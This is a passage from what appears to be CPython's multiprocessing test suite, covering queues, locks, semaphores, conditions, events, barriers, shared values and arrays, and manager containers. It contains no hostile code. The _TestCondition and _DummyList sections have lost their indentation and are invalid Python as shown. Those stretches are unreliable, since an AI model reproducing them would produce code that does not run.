            def __reduce__(self):
                raise AttributeError
        with test.support.captured_stderr():
            q = self.Queue()
            q.put(NotSerializable())
            q.put(True)
            # bpo-30595: use a timeout of 1 second for slow buildbots
            self.assertTrue(q.get(timeout=1.0))
            close_queue(q)
        with test.support.captured_stderr():
            # bpo-33078: verify that the queue size is correctly handled
            # on errors.
            q = self.Queue(maxsize=1)
            q.put(NotSerializable())
            q.put(True)
            try:
                self.assertEqual(q.qsize(), 1)
            except NotImplementedError:
                # qsize is not available on all platform as it
                # relies on sem_getvalue
                pass
            # bpo-30595: use a timeout of 1 second for slow buildbots
            self.assertTrue(q.get(timeout=1.0))
            # Check that the size of the queue is correct
            self.assertTrue(q.empty())
            close_queue(q)
    def test_queue_feeder_on_queue_feeder_error(self):
        # bpo-30006: verify feeder handles exceptions using the
        # _on_queue_feeder_error hook.
        if self.TYPE != 'processes':
            self.skipTest('test not appropriate for {}'.format(self.TYPE))
        class NotSerializable(object):
            """Mock unserializable object"""
            def __init__(self):
                self.reduce_was_called = False
                self.on_queue_feeder_error_was_called = False
            def __reduce__(self):
                self.reduce_was_called = True
                raise AttributeError
        class SafeQueue(multiprocessing.queues.Queue):
            """Queue with overloaded _on_queue_feeder_error hook"""
            @staticmethod
            def _on_queue_feeder_error(e, obj):
                if (isinstance(e, AttributeError) and
                        isinstance(obj, NotSerializable)):
                    obj.on_queue_feeder_error_was_called = True
        not_serializable_obj = NotSerializable()
        # The captured_stderr reduces the noise in the test report
        with test.support.captured_stderr():
            q = SafeQueue(ctx=multiprocessing.get_context())
            q.put(not_serializable_obj)
            # Verify that q is still functioning correctly
            q.put(True)
            self.assertTrue(q.get(timeout=1.0))
        # Assert that the serialization and the hook have been called correctly
        self.assertTrue(not_serializable_obj.reduce_was_called)
        self.assertTrue(not_serializable_obj.on_queue_feeder_error_was_called)
#
#
#
class _TestLock(BaseTestCase):
    """Basic Lock/RLock acquire-release contract checks."""
    def test_lock(self):
        lock = self.Lock()
        self.assertEqual(lock.acquire(), True)
        # A non-blocking second acquire on a held lock must fail.
        self.assertEqual(lock.acquire(False), False)
        self.assertEqual(lock.release(), None)
        self.assertRaises((ValueError, threading.ThreadError), lock.release)
    def test_rlock(self):
        lock = self.RLock()
        # An RLock may be acquired repeatedly by its owner...
        self.assertEqual(lock.acquire(), True)
        self.assertEqual(lock.acquire(), True)
        self.assertEqual(lock.acquire(), True)
        # ...and must be released the same number of times.
        self.assertEqual(lock.release(), None)
        self.assertEqual(lock.release(), None)
        self.assertEqual(lock.release(), None)
        self.assertRaises((AssertionError, RuntimeError), lock.release)
    def test_lock_context(self):
        with self.Lock():
            pass
class _TestSemaphore(BaseTestCase):
    """Semaphore/BoundedSemaphore counting behaviour."""
    def _test_semaphore(self, sem):
        # *sem* starts with a value of 2; walk it down to 0 and back up.
        self.assertReturnsIfImplemented(2, get_value, sem)
        self.assertEqual(sem.acquire(), True)
        self.assertReturnsIfImplemented(1, get_value, sem)
        self.assertEqual(sem.acquire(), True)
        self.assertReturnsIfImplemented(0, get_value, sem)
        self.assertEqual(sem.acquire(False), False)
        self.assertReturnsIfImplemented(0, get_value, sem)
        self.assertEqual(sem.release(), None)
        self.assertReturnsIfImplemented(1, get_value, sem)
        self.assertEqual(sem.release(), None)
        self.assertReturnsIfImplemented(2, get_value, sem)
    def test_semaphore(self):
        sem = self.Semaphore(2)
        self._test_semaphore(sem)
        # A plain Semaphore may be released beyond its initial value.
        self.assertEqual(sem.release(), None)
        self.assertReturnsIfImplemented(3, get_value, sem)
        self.assertEqual(sem.release(), None)
        self.assertReturnsIfImplemented(4, get_value, sem)
    def test_bounded_semaphore(self):
        sem = self.BoundedSemaphore(2)
        self._test_semaphore(sem)
        # Currently fails on OS/X
        #if HAVE_GETVALUE:
        #    self.assertRaises(ValueError, sem.release)
        #    self.assertReturnsIfImplemented(2, get_value, sem)
    def test_timeout(self):
        if self.TYPE != 'processes':
            self.skipTest('test not appropriate for {}'.format(self.TYPE))
        sem = self.Semaphore(0)
        acquire = TimingWrapper(sem.acquire)
        # Non-blocking acquires must return immediately...
        self.assertEqual(acquire(False), False)
        self.assertTimingAlmostEqual(acquire.elapsed, 0.0)
        self.assertEqual(acquire(False, None), False)
        self.assertTimingAlmostEqual(acquire.elapsed, 0.0)
        self.assertEqual(acquire(False, TIMEOUT1), False)
        self.assertTimingAlmostEqual(acquire.elapsed, 0)
        # ...while blocking acquires must honour their timeout.
        self.assertEqual(acquire(True, TIMEOUT2), False)
        self.assertTimingAlmostEqual(acquire.elapsed, TIMEOUT2)
        self.assertEqual(acquire(timeout=TIMEOUT3), False)
        self.assertTimingAlmostEqual(acquire.elapsed, TIMEOUT3)
class _TestCondition(BaseTestCase):
@classmethod
def f(cls, cond, sleeping, woken, timeout=None):
cond.acquire()
sleeping.release()
cond.wait(timeout)
woken.release()
cond.release()
def assertReachesEventually(self, func, value):
for i in range(10):
try:
if func() == value:
break
except NotImplementedError:
break
time.sleep(DELTA)
time.sleep(DELTA)
self.assertReturnsIfImplemented(value, func)
def check_invariant(self, cond):
# this is only supposed to succeed when there are no sleepers
if self.TYPE == 'processes':
try:
sleepers = (cond._sleeping_count.get_value() -
cond._woken_count.get_value())
self.assertEqual(sleepers, 0)
self.assertEqual(cond._wait_semaphore.get_value(), 0)
except NotImplementedError:
pass
def test_notify(self):
cond = self.Condition()
sleeping = self.Semaphore(0)
woken = self.Semaphore(0)
p = self.Process(target=self.f, args=(cond, sleeping, woken))
p.daemon = True
p.start()
self.addCleanup(p.join)
p = threading.Thread(target=self.f, args=(cond, sleeping, woken))
p.daemon = True
p.start()
self.addCleanup(p.join)
# wait for both children to start sleeping
sleeping.acquire()
sleeping.acquire()
# check no process/thread has woken up
time.sleep(DELTA)
self.assertReturnsIfImplemented(0, get_value, woken)
# wake up one process/thread
cond.acquire()
cond.notify()
cond.release()
# check one process/thread has woken up
time.sleep(DELTA)
self.assertReturnsIfImplemented(1, get_value, woken)
# wake up another
cond.acquire()
cond.notify()
cond.release()
# check other has woken up
time.sleep(DELTA)
self.assertReturnsIfImplemented(2, get_value, woken)
# check state is not mucked up
self.check_invariant(cond)
p.join()
def test_notify_all(self):
cond = self.Condition()
sleeping = self.Semaphore(0)
woken = self.Semaphore(0)
# start some threads/processes which will timeout
for i in range(3):
p = self.Process(target=self.f,
args=(cond, sleeping, woken, TIMEOUT1))
p.daemon = True
p.start()
self.addCleanup(p.join)
t = threading.Thread(target=self.f,
args=(cond, sleeping, woken, TIMEOUT1))
t.daemon = True
t.start()
self.addCleanup(t.join)
# wait for them all to sleep
for i in range(6):
sleeping.acquire()
# check they have all timed out
for i in range(6):
woken.acquire()
self.assertReturnsIfImplemented(0, get_value, woken)
# check state is not mucked up
self.check_invariant(cond)
# start some more threads/processes
for i in range(3):
p = self.Process(target=self.f, args=(cond, sleeping, woken))
p.daemon = True
p.start()
self.addCleanup(p.join)
t = threading.Thread(target=self.f, args=(cond, sleeping, woken))
t.daemon = True
t.start()
self.addCleanup(t.join)
# wait for them to all sleep
for i in range(6):
sleeping.acquire()
# check no process/thread has woken up
time.sleep(DELTA)
self.assertReturnsIfImplemented(0, get_value, woken)
# wake them all up
cond.acquire()
cond.notify_all()
cond.release()
# check they have all woken
self.assertReachesEventually(lambda: get_value(woken), 6)
# check state is not mucked up
self.check_invariant(cond)
def test_notify_n(self):
cond = self.Condition()
sleeping = self.Semaphore(0)
woken = self.Semaphore(0)
# start some threads/processes
for i in range(3):
p = self.Process(target=self.f, args=(cond, sleeping, woken))
p.daemon = True
p.start()
self.addCleanup(p.join)
t = threading.Thread(target=self.f, args=(cond, sleeping, woken))
t.daemon = True
t.start()
self.addCleanup(t.join)
# wait for them to all sleep
for i in range(6):
sleeping.acquire()
# check no process/thread has woken up
time.sleep(DELTA)
self.assertReturnsIfImplemented(0, get_value, woken)
# wake some of them up
cond.acquire()
cond.notify(n=2)
cond.release()
# check 2 have woken
self.assertReachesEventually(lambda: get_value(woken), 2)
# wake the rest of them
cond.acquire()
cond.notify(n=4)
cond.release()
self.assertReachesEventually(lambda: get_value(woken), 6)
# doesn't do anything more
cond.acquire()
cond.notify(n=3)
cond.release()
self.assertReturnsIfImplemented(6, get_value, woken)
# check state is not mucked up
self.check_invariant(cond)
def test_timeout(self):
cond = self.Condition()
wait = TimingWrapper(cond.wait)
cond.acquire()
res = wait(TIMEOUT1)
cond.release()
self.assertEqual(res, False)
self.assertTimingAlmostEqual(wait.elapsed, TIMEOUT1)
@classmethod
def _test_waitfor_f(cls, cond, state):
with cond:
state.value = 0
cond.notify()
result = cond.wait_for(lambda : state.value==4)
if not result or state.value != 4:
sys.exit(1)
@unittest.skipUnless(HAS_SHAREDCTYPES, 'needs sharedctypes')
def test_waitfor(self):
# based on test in test/lock_tests.py
cond = self.Condition()
state = self.Value('i', -1)
p = self.Process(target=self._test_waitfor_f, args=(cond, state))
p.daemon = True
p.start()
with cond:
result = cond.wait_for(lambda : state.value==0)
self.assertTrue(result)
self.assertEqual(state.value, 0)
for i in range(4):
time.sleep(0.01)
with cond:
state.value += 1
cond.notify()
join_process(p)
self.assertEqual(p.exitcode, 0)
@classmethod
def _test_waitfor_timeout_f(cls, cond, state, success, sem):
sem.release()
with cond:
expected = 0.1
dt = time.time()
result = cond.wait_for(lambda : state.value==4, timeout=expected)
dt = time.time() - dt
# borrow logic in assertTimeout() from test/lock_tests.py
if not result and expected * 0.6 < dt < expected * 10.0:
success.value = True
@unittest.skipUnless(HAS_SHAREDCTYPES, 'needs sharedctypes')
def test_waitfor_timeout(self):
# based on test in test/lock_tests.py
cond = self.Condition()
state = self.Value('i', 0)
success = self.Value('i', False)
sem = self.Semaphore(0)
p = self.Process(target=self._test_waitfor_timeout_f,
args=(cond, state, success, sem))
p.daemon = True
p.start()
self.assertTrue(sem.acquire(timeout=TIMEOUT))
# Only increment 3 times, so state == 4 is never reached.
for i in range(3):
time.sleep(0.01)
with cond:
state.value += 1
cond.notify()
join_process(p)
self.assertTrue(success.value)
@classmethod
def _test_wait_result(cls, c, pid):
with c:
c.notify()
time.sleep(1)
if pid is not None:
os.kill(pid, signal.SIGINT)
    def test_wait_result(self):
        """wait() returns False on timeout, True when notified, and raises
        KeyboardInterrupt when the waiting process receives SIGINT."""
        if isinstance(self, ProcessesMixin) and sys.platform != 'win32':
            # Only POSIX process-based tests can be interrupted via os.kill.
            pid = os.getpid()
        else:
            pid = None

        c = self.Condition()
        with c:
            self.assertFalse(c.wait(0))
            self.assertFalse(c.wait(0.1))

            p = self.Process(target=self._test_wait_result, args=(c, pid))
            p.start()

            self.assertTrue(c.wait(60))
            if pid is not None:
                self.assertRaises(KeyboardInterrupt, c.wait, 60)

        p.join()
class _TestEvent(BaseTestCase):
    """Tests for Event objects (set/clear/is_set/wait semantics)."""

    @classmethod
    def _test_event(cls, event):
        # Child process: set the event after a delay so the parent's
        # final blocking wait() has something to wake up on.
        time.sleep(TIMEOUT2)
        event.set()

    def test_event(self):
        event = self.Event()
        wait = TimingWrapper(event.wait)

        # Removed temporarily, due to API shear, this does not
        # work with threading._Event objects. is_set == isSet
        self.assertEqual(event.is_set(), False)

        # Removed, threading.Event.wait() will return the value of the __flag
        # instead of None. API Shear with the semaphore backed mp.Event
        self.assertEqual(wait(0.0), False)
        self.assertTimingAlmostEqual(wait.elapsed, 0.0)
        self.assertEqual(wait(TIMEOUT1), False)
        self.assertTimingAlmostEqual(wait.elapsed, TIMEOUT1)

        event.set()

        # See note above on the API differences
        self.assertEqual(event.is_set(), True)
        # Once set, wait() returns immediately regardless of timeout.
        self.assertEqual(wait(), True)
        self.assertTimingAlmostEqual(wait.elapsed, 0.0)
        self.assertEqual(wait(TIMEOUT1), True)
        self.assertTimingAlmostEqual(wait.elapsed, 0.0)
        # self.assertEqual(event.is_set(), True)

        event.clear()

        #self.assertEqual(event.is_set(), False)

        p = self.Process(target=self._test_event, args=(event,))
        p.daemon = True
        p.start()
        self.assertEqual(wait(), True)
        p.join()
#
# Tests for Barrier - adapted from tests in test/lock_tests.py
#
# Many of the tests for threading.Barrier use a list as an atomic
# counter: a value is appended to increment the counter, and the
# length of the list gives the value. We use the class DummyList
# for the same purpose.
class _DummyList(object):
def __init__(self):
wrapper = multiprocessing.heap.BufferWrapper(struct.calcsize('i'))
lock = multiprocessing.Lock()
self.__setstate__((wrapper, lock))
self._lengthbuf[0] = 0
def __setstate__(self, state):
(self._wrapper, self._lock) = state
self._lengthbuf = self._wrapper.create_memoryview().cast('i')
def __getstate__(self):
return (self._wrapper, self._lock)
def append(self, _):
with self._lock:
self._lengthbuf[0] += 1
def __len__(self):
with self._lock:
return self._lengthbuf[0]
def _wait():
# A crude wait/yield function not relying on synchronization primitives.
time.sleep(0.01)
class Bunch(object):
    """
    A bunch of threads.
    """
    def __init__(self, namespace, f, args, n, wait_before_exit=False):
        """
        Construct a bunch of `n` threads running the same function `f`.
        If `wait_before_exit` is True, the threads won't terminate until
        do_finish() is called.
        """
        self.f = f
        self.args = args
        self.n = n
        # Cross-process counters of workers that have started / finished.
        self.started = namespace.DummyList()
        self.finished = namespace.DummyList()
        self._can_exit = namespace.Event()
        if not wait_before_exit:
            self._can_exit.set()

        threads = []
        for i in range(n):
            p = namespace.Process(target=self.task)
            p.daemon = True
            p.start()
            threads.append(p)

        def finalize(threads):
            for p in threads:
                p.join()

        # Join all workers when this Bunch is garbage-collected or close()d.
        self._finalizer = weakref.finalize(self, finalize, threads)

    def task(self):
        pid = os.getpid()
        self.started.append(pid)
        try:
            self.f(*self.args)
        finally:
            self.finished.append(pid)
            # Hold the worker alive until the test allows it to exit.
            self._can_exit.wait(30)
            assert self._can_exit.is_set()

    def wait_for_started(self):
        # Busy-wait until every worker has registered itself.
        while len(self.started) < self.n:
            _wait()

    def wait_for_finished(self):
        while len(self.finished) < self.n:
            _wait()

    def do_finish(self):
        self._can_exit.set()

    def close(self):
        self._finalizer()
class AppendTrue(object):
    """Picklable callable that appends True to a fixed container.

    Used as a Barrier 'action' callback, where a plain lambda could not be
    sent to another process.
    """

    def __init__(self, obj):
        self.obj = obj

    def __call__(self):
        self.obj.append(True)
class _TestBarrier(BaseTestCase):
    """
    Tests for Barrier objects.
    """
    N = 5
    defaultTimeout = 30.0  # XXX Slow Windows buildbots need generous timeout

    def setUp(self):
        self.barrier = self.Barrier(self.N, timeout=self.defaultTimeout)

    def tearDown(self):
        self.barrier.abort()
        self.barrier = None

    def DummyList(self):
        # Pick an "atomic counter" implementation suited to the backend.
        if self.TYPE == 'threads':
            return []
        elif self.TYPE == 'manager':
            return self.manager.list()
        else:
            return _DummyList()

    def run_threads(self, f, args):
        # Run f(*args) in N-1 helper workers plus the current process.
        b = Bunch(self, f, args, self.N-1)
        try:
            f(*args)
            b.wait_for_finished()
        finally:
            b.close()

    @classmethod
    def multipass(cls, barrier, results, n):
        # Each pass appends to results[0] before the first wait and to
        # results[1] after it; the length checks prove lockstep progress.
        m = barrier.parties
        assert m == cls.N
        for i in range(n):
            results[0].append(True)
            assert len(results[1]) == i * m
            barrier.wait()
            results[1].append(True)
            assert len(results[0]) == (i + 1) * m
            barrier.wait()
        try:
            assert barrier.n_waiting == 0
        except NotImplementedError:
            pass
        assert not barrier.broken

    def test_barrier(self, passes=1):
        """
        Test that a barrier is passed in lockstep
        """
        results = [self.DummyList(), self.DummyList()]
        self.run_threads(self.multipass, (self.barrier, results, passes))

    def test_barrier_10(self):
        """
        Test that a barrier works for 10 consecutive runs
        """
        return self.test_barrier(10)

    @classmethod
    def _test_wait_return_f(cls, barrier, queue):
        res = barrier.wait()
        queue.put(res)

    def test_wait_return(self):
        """
        test the return value from barrier.wait
        """
        queue = self.Queue()
        self.run_threads(self._test_wait_return_f, (self.barrier, queue))
        results = [queue.get() for i in range(self.N)]
        # Exactly one waiter receives index 0.
        self.assertEqual(results.count(0), 1)
        close_queue(queue)

    @classmethod
    def _test_action_f(cls, barrier, results):
        barrier.wait()
        # The action callback must have run exactly once before release.
        if len(results) != 1:
            raise RuntimeError

    def test_action(self):
        """
        Test the 'action' callback
        """
        results = self.DummyList()
        barrier = self.Barrier(self.N, action=AppendTrue(results))
        self.run_threads(self._test_action_f, (barrier, results))
        self.assertEqual(len(results), 1)

    @classmethod
    def _test_abort_f(cls, barrier, results1, results2):
        try:
            i = barrier.wait()
            if i == cls.N//2:
                # One designated worker breaks the barrier via abort().
                raise RuntimeError
            barrier.wait()
            results1.append(True)
        except threading.BrokenBarrierError:
            results2.append(True)
        except RuntimeError:
            barrier.abort()

    def test_abort(self):
        """
        Test that an abort will put the barrier in a broken state
        """
        results1 = self.DummyList()
        results2 = self.DummyList()
        self.run_threads(self._test_abort_f,
                         (self.barrier, results1, results2))
        self.assertEqual(len(results1), 0)
        self.assertEqual(len(results2), self.N-1)
        self.assertTrue(self.barrier.broken)

    @classmethod
    def _test_reset_f(cls, barrier, results1, results2, results3):
        i = barrier.wait()
        if i == cls.N//2:
            # Wait until the other threads are all in the barrier.
            while barrier.n_waiting < cls.N-1:
                time.sleep(0.001)
            barrier.reset()
        else:
            try:
                barrier.wait()
                results1.append(True)
            except threading.BrokenBarrierError:
                results2.append(True)
        # Now, pass the barrier again
        barrier.wait()
        results3.append(True)

    def test_reset(self):
        """
        Test that a 'reset' on a barrier frees the waiting threads
        """
        results1 = self.DummyList()
        results2 = self.DummyList()
        results3 = self.DummyList()
        self.run_threads(self._test_reset_f,
                         (self.barrier, results1, results2, results3))
        self.assertEqual(len(results1), 0)
        self.assertEqual(len(results2), self.N-1)
        self.assertEqual(len(results3), self.N)

    @classmethod
    def _test_abort_and_reset_f(cls, barrier, barrier2,
                                results1, results2, results3):
        try:
            i = barrier.wait()
            if i == cls.N//2:
                raise RuntimeError
            barrier.wait()
            results1.append(True)
        except threading.BrokenBarrierError:
            results2.append(True)
        except RuntimeError:
            barrier.abort()
        # Synchronize and reset the barrier. Must synchronize first so
        # that everyone has left it when we reset, and after so that no
        # one enters it before the reset.
        if barrier2.wait() == cls.N//2:
            barrier.reset()
        barrier2.wait()
        barrier.wait()
        results3.append(True)

    def test_abort_and_reset(self):
        """
        Test that a barrier can be reset after being broken.
        """
        results1 = self.DummyList()
        results2 = self.DummyList()
        results3 = self.DummyList()
        barrier2 = self.Barrier(self.N)
        self.run_threads(self._test_abort_and_reset_f,
                         (self.barrier, barrier2, results1, results2, results3))
        self.assertEqual(len(results1), 0)
        self.assertEqual(len(results2), self.N-1)
        self.assertEqual(len(results3), self.N)

    @classmethod
    def _test_timeout_f(cls, barrier, results):
        i = barrier.wait()
        if i == cls.N//2:
            # One thread is late!
            time.sleep(1.0)
        try:
            barrier.wait(0.5)
        except threading.BrokenBarrierError:
            results.append(True)

    def test_timeout(self):
        """
        Test wait(timeout)
        """
        results = self.DummyList()
        self.run_threads(self._test_timeout_f, (self.barrier, results))
        self.assertEqual(len(results), self.barrier.parties)

    @classmethod
    def _test_default_timeout_f(cls, barrier, results):
        i = barrier.wait(cls.defaultTimeout)
        if i == cls.N//2:
            # One thread is later than the default timeout
            time.sleep(1.0)
        try:
            barrier.wait()
        except threading.BrokenBarrierError:
            results.append(True)

    def test_default_timeout(self):
        """
        Test the barrier's default timeout
        """
        barrier = self.Barrier(self.N, timeout=0.5)
        results = self.DummyList()
        self.run_threads(self._test_default_timeout_f, (barrier, results))
        self.assertEqual(len(results), barrier.parties)

    def test_single_thread(self):
        # A one-party barrier never blocks.
        b = self.Barrier(1)
        b.wait()
        b.wait()

    @classmethod
    def _test_thousand_f(cls, barrier, passes, conn, lock):
        for i in range(passes):
            barrier.wait()
            with lock:
                conn.send(i)

    def test_thousand(self):
        if self.TYPE == 'manager':
            self.skipTest('test not appropriate for {}'.format(self.TYPE))
        passes = 1000
        lock = self.Lock()
        conn, child_conn = self.Pipe(False)
        for j in range(self.N):
            p = self.Process(target=self._test_thousand_f,
                             args=(self.barrier, passes, child_conn, lock))
            p.start()
            self.addCleanup(p.join)

        # Lockstep guarantee: all N messages for pass i arrive before any
        # message for pass i+1.
        for i in range(passes):
            for j in range(self.N):
                self.assertEqual(conn.recv(), i)
#
#
#
class _TestValue(BaseTestCase):
    """Tests for shared ctypes Value/RawValue objects."""

    ALLOWED_TYPES = ('processes',)

    # (typecode, initial value, value written by the child process)
    codes_values = [
        ('i', 4343, 24234),
        ('d', 3.625, -4.25),
        ('h', -232, 234),
        ('q', 2 ** 33, 2 ** 34),
        ('c', latin('x'), latin('y'))
        ]

    def setUp(self):
        if not HAS_SHAREDCTYPES:
            self.skipTest("requires multiprocessing.sharedctypes")

    @classmethod
    def _test(cls, values):
        # Child: overwrite every shared value with the third tuple element.
        for sv, cv in zip(values, cls.codes_values):
            sv.value = cv[2]

    def test_value(self, raw=False):
        """Writes made by a child process are visible in the parent."""
        if raw:
            values = [self.RawValue(code, value)
                      for code, value, _ in self.codes_values]
        else:
            values = [self.Value(code, value)
                      for code, value, _ in self.codes_values]

        for sv, cv in zip(values, self.codes_values):
            self.assertEqual(sv.value, cv[1])

        proc = self.Process(target=self._test, args=(values,))
        proc.daemon = True
        proc.start()
        proc.join()

        for sv, cv in zip(values, self.codes_values):
            self.assertEqual(sv.value, cv[2])

    def test_rawvalue(self):
        self.test_value(raw=True)

    def test_getobj_getlock(self):
        """Check the lock= variants of Value and the RawValue API surface."""
        val1 = self.Value('i', 5)
        lock1 = val1.get_lock()
        obj1 = val1.get_obj()

        val2 = self.Value('i', 5, lock=None)
        lock2 = val2.get_lock()
        obj2 = val2.get_obj()

        # An explicit lock object must be used as-is.
        lock = self.Lock()
        val3 = self.Value('i', 5, lock=lock)
        lock3 = val3.get_lock()
        obj3 = val3.get_obj()
        self.assertEqual(lock, lock3)

        # lock=False yields a raw (lock-less) wrapper.
        arr4 = self.Value('i', 5, lock=False)
        self.assertFalse(hasattr(arr4, 'get_lock'))
        self.assertFalse(hasattr(arr4, 'get_obj'))

        self.assertRaises(AttributeError, self.Value, 'i', 5, lock='navalue')

        arr5 = self.RawValue('i', 5)
        self.assertFalse(hasattr(arr5, 'get_lock'))
        self.assertFalse(hasattr(arr5, 'get_obj'))
class _TestArray(BaseTestCase):
    """Tests for shared ctypes Array/RawArray objects."""

    ALLOWED_TYPES = ('processes',)

    @classmethod
    def f(cls, seq):
        # In-place prefix sum; run in a child to verify shared mutation.
        for i in range(1, len(seq)):
            seq[i] += seq[i-1]

    @unittest.skipIf(c_int is None, "requires _ctypes")
    def test_array(self, raw=False):
        seq = [680, 626, 934, 821, 150, 233, 548, 982, 714, 831]
        if raw:
            arr = self.RawArray('i', seq)
        else:
            arr = self.Array('i', seq)

        self.assertEqual(len(arr), len(seq))
        self.assertEqual(arr[3], seq[3])
        self.assertEqual(list(arr[2:7]), list(seq[2:7]))

        arr[4:8] = seq[4:8] = array.array('i', [1, 2, 3, 4])

        self.assertEqual(list(arr[:]), seq)

        # Apply the same transformation locally and in a child process;
        # the results must match.
        self.f(seq)

        p = self.Process(target=self.f, args=(arr,))
        p.daemon = True
        p.start()
        p.join()

        self.assertEqual(list(arr[:]), seq)

    @unittest.skipIf(c_int is None, "requires _ctypes")
    def test_array_from_size(self):
        size = 10
        # Test for zeroing (see issue #11675).
        # The repetition below strengthens the test by increasing the chances
        # of previously allocated non-zero memory being used for the new array
        # on the 2nd and 3rd loops.
        for _ in range(3):
            arr = self.Array('i', size)
            self.assertEqual(len(arr), size)
            self.assertEqual(list(arr), [0] * size)
            arr[:] = range(10)
            self.assertEqual(list(arr), list(range(10)))
            del arr

    @unittest.skipIf(c_int is None, "requires _ctypes")
    def test_rawarray(self):
        self.test_array(raw=True)

    @unittest.skipIf(c_int is None, "requires _ctypes")
    def test_getobj_getlock_obj(self):
        arr1 = self.Array('i', list(range(10)))
        lock1 = arr1.get_lock()
        obj1 = arr1.get_obj()

        arr2 = self.Array('i', list(range(10)), lock=None)
        lock2 = arr2.get_lock()
        obj2 = arr2.get_obj()

        # An explicit lock object must be used as-is.
        lock = self.Lock()
        arr3 = self.Array('i', list(range(10)), lock=lock)
        lock3 = arr3.get_lock()
        obj3 = arr3.get_obj()
        self.assertEqual(lock, lock3)

        # lock=False yields a raw (lock-less) wrapper.
        arr4 = self.Array('i', range(10), lock=False)
        self.assertFalse(hasattr(arr4, 'get_lock'))
        self.assertFalse(hasattr(arr4, 'get_obj'))

        self.assertRaises(AttributeError,
                          self.Array, 'i', range(10), lock='notalock')

        arr5 = self.RawArray('i', range(10))
        self.assertFalse(hasattr(arr5, 'get_lock'))
        self.assertFalse(hasattr(arr5, 'get_obj'))
#
#
#
class _TestContainers(BaseTestCase):
    """Tests for manager-backed list/dict/Namespace proxies."""

    ALLOWED_TYPES = ('manager',)

    def test_list(self):
        a = self.list(list(range(10)))
        self.assertEqual(a[:], list(range(10)))

        b = self.list()
        self.assertEqual(b[:], [])

        b.extend(list(range(5)))
        self.assertEqual(b[:], list(range(5)))

        self.assertEqual(b[2], 2)
        self.assertEqual(b[2:10], [2,3,4])

        b *= 2
        self.assertEqual(b[:], [0, 1, 2, 3, 4, 0, 1, 2, 3, 4])

        self.assertEqual(b + [5, 6], [0, 1, 2, 3, 4, 0, 1, 2, 3, 4, 5, 6])

        self.assertEqual(a[:], list(range(10)))

        # Proxies nested inside another proxied list keep working.
        d = [a, b]
        e = self.list(d)
        self.assertEqual(
            [element[:] for element in e],
            [[0, 1, 2, 3, 4, 5, 6, 7, 8, 9], [0, 1, 2, 3, 4, 0, 1, 2, 3, 4]]
            )

        f = self.list([a])
        a.append('hello')
        self.assertEqual(f[0][:], [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 'hello'])

    def test_list_iter(self):
        a = self.list(list(range(10)))
        it = iter(a)
        self.assertEqual(list(it), list(range(10)))
        self.assertEqual(list(it), []) # exhausted
        # list modified during iteration
        it = iter(a)
        a[0] = 100
        self.assertEqual(next(it), 100)

    def test_list_proxy_in_list(self):
        a = self.list([self.list(range(3)) for _i in range(3)])
        self.assertEqual([inner[:] for inner in a], [[0, 1, 2]] * 3)

        a[0][-1] = 55
        self.assertEqual(a[0][:], [0, 1, 55])
        for i in range(1, 3):
            self.assertEqual(a[i][:], [0, 1, 2])

        self.assertEqual(a[1].pop(), 2)
        self.assertEqual(len(a[1]), 2)
        for i in range(0, 3, 2):
            self.assertEqual(len(a[i]), 3)

        del a

        # A self-referential proxy must not prevent cleanup.
        b = self.list()
        b.append(b)
        del b

    def test_dict(self):
        d = self.dict()
        indices = list(range(65, 70))
        for i in indices:
            d[i] = chr(i)
        self.assertEqual(d.copy(), dict((i, chr(i)) for i in indices))
        self.assertEqual(sorted(d.keys()), indices)
        self.assertEqual(sorted(d.values()), [chr(i) for i in indices])
        self.assertEqual(sorted(d.items()), [(i, chr(i)) for i in indices])

    def test_dict_iter(self):
        d = self.dict()
        indices = list(range(65, 70))
        for i in indices:
            d[i] = chr(i)
        it = iter(d)
        self.assertEqual(list(it), indices)
        self.assertEqual(list(it), []) # exhausted
        # dictionary changed size during iteration
        it = iter(d)
        d.clear()
        self.assertRaises(RuntimeError, next, it)

    def test_dict_proxy_nested(self):
        pets = self.dict(ferrets=2, hamsters=4)
        supplies = self.dict(water=10, feed=3)
        d = self.dict(pets=pets, supplies=supplies)

        self.assertEqual(supplies['water'], 10)
        self.assertEqual(d['supplies']['water'], 10)

        d['supplies']['blankets'] = 5
        self.assertEqual(supplies['blankets'], 5)
        self.assertEqual(d['supplies']['blankets'], 5)

        d['supplies']['water'] = 7
        self.assertEqual(supplies['water'], 7)
        self.assertEqual(d['supplies']['water'], 7)

        # Nested proxies stay usable after local references go away.
        del pets
        del supplies
        self.assertEqual(d['pets']['ferrets'], 2)
        d['supplies']['blankets'] = 11
        self.assertEqual(d['supplies']['blankets'], 11)

        pets = d['pets']
        supplies = d['supplies']
        supplies['water'] = 7
        self.assertEqual(supplies['water'], 7)
        self.assertEqual(d['supplies']['water'], 7)

        # Clearing the outer dict does not destroy the inner proxies.
        d.clear()
        self.assertEqual(len(d), 0)
        self.assertEqual(supplies['water'], 7)
        self.assertEqual(pets['hamsters'], 4)

        l = self.list([pets, supplies])
        l[0]['marmots'] = 1
        self.assertEqual(pets['marmots'], 1)
        self.assertEqual(l[0]['marmots'], 1)

        del pets
        del supplies
        self.assertEqual(l[0]['marmots'], 1)

        outer = self.list([[88, 99], l])
        self.assertIsInstance(outer[0], list) # Not a ListProxy
        self.assertEqual(outer[-1][-1]['feed'], 3)

    def test_namespace(self):
        n = self.Namespace()
        n.name = 'Bob'
        n.job = 'Builder'
        n._hidden = 'hidden'
        self.assertEqual((n.name, n.job), ('Bob', 'Builder'))
        del n.job
        # Underscore attributes are excluded from the repr, and the
        # deleted attribute no longer appears.
        self.assertEqual(str(n), "Namespace(name='Bob')")
        self.assertTrue(hasattr(n, 'name'))
        self.assertTrue(not hasattr(n, 'job'))
#
#
#
def sqr(x, wait=0.0):
    """Return *x* squared after an optional delay of *wait* seconds."""
    time.sleep(wait)
    return x * x
def mul(x, y):
    """Return the product of *x* and *y*."""
    return x * y
def raise_large_valuerror(wait):
    """Sleep *wait* seconds, then raise a ValueError with a ~1 MiB message.

    The oversized message exercises pipe-filling behaviour in the pool tests.
    """
    time.sleep(wait)
    raise ValueError("x" * 1024**2)
def identity(x):
    """Return the argument unchanged."""
    return x
class CountedObject(object):
    """Object that tracks how many of its instances are currently alive."""

    # Live-instance count: bumped in __new__, dropped in __del__.
    n_instances = 0

    def __new__(cls):
        cls.n_instances += 1
        return object.__new__(cls)

    def __del__(self):
        type(self).n_instances -= 1
class SayWhenError(ValueError): pass
def exception_throwing_generator(total, when):
    """Yield 0 .. total-1, raising SayWhenError upon reaching index *when*.

    A *when* of -1 raises before the first value is produced.  Values of
    *when* outside the range never trigger the error.
    """
